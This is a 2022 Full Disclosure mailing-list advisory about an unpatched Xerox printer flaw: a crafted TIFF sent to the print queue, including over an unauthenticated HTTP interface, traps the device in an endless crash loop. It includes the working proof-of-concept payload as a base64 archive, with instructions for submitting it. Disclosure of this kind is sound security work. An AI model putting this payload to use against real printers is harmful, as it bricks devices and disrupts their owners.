| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 24 Jan 2022 17:21:32 -0600 From: Mahmoud Al-Qudsi <mqudsi@...smart.net> To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org> Subject: [FD] Xerox vulnerability allows unauthenticated remote users to remotely brick network printers [+] Credits: Mahmoud Al-Qudsi [+] Website: https://neosmart.net/ [+] Source: https://neosmart.net/blog/?p=4865 [+] Media: https://twitter.com/mqudsi and https://twitter.com/neosmart [Vendor] Xerox Corporation [Product] Xerox Versalink printers, other Xerox printers/copiers. [Vulnerability Type] Remote denial-of-service leading to bricked device. [Security Issue] A specifically crafted TIFF payload may be submitted to the printer's job queue (in person or over the network) by unauthenticated/unprivileged users or network or internet attackers by means of a JavaScript payload. The device will panic upon attempting to read the submitted file and a physical reboot will be required. Upon reboot, the device will attempt to resume the last-printed job, triggering the panic once more. The process repeats ad-infinitum. [Exploit/PoC] Extract the TIFF contents of the base64-encode archive below and submit directly to the job queue on a vulnerable printer to trigger the exploit: UmFyIRoHAQAzkrXlCgEFBgAFAQGAgAD5BbdHEwMC5QAE5QAA9kPUNIAAAANDTVRYZXJveCByZW1v dGUgYnJpY2sgcGF5bG9hZCBieSBNYWhtb3VkIEFsLVF1ZHNpDQpTZWUgaHR0cHM6Ly9uZW9zbWFy dC5uZXQvYmxvZy8/cD00ODY1IGZvciBtb3JlIGluZm8uAOsG2ysrAgMLjQEEvAMgCd+uuYADAA94 ZXJveCBicmljay50aWYKAwIA/Fsg4nPVAcISiiBENSb2YDSTz9+g+ofkEQVoaUFeJvK3kDY8WbGp HgjY0bFPe8gzgjwjaJNmzSGzlGGm0ZRkySYEISicQttsKElCEti8EbSsdkcDz6/WmRz/N1o/EIEf YPQUn+fPO4RLXjWeRbJT8isQTI5AnW6pF0WsD5DaxM4tgNHp3U7xR1fsHuvMYwMeDGyHIB13VlED BQQA [Network Access] Local or remote The sample payload may also be submitted to exploit a Xerox printer with a known ip address or host name over the web by taking advantage of the unprotected HTTP POST interface exposed by the device on its network interface. [Severity] Critical The denial-of-service attack results in a semi-permanent "bricking" of the Xerox printer. Recovery may be possible if there are unapplied firmware updates by forcing an update over the network, which clears the job queue in the process. Otherwise, manually clearing the non-volatile storage memory on the device's mainboard is required to break out of the loop. [Disclosure Timeline] - September 26, 2019: Reported to Xerox - January 14, 2020: Confirmed by Xerox in response to a request for updates - January 25, 2022: Publicly disclosed, remains unpatched and exploitable Mahmoud _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists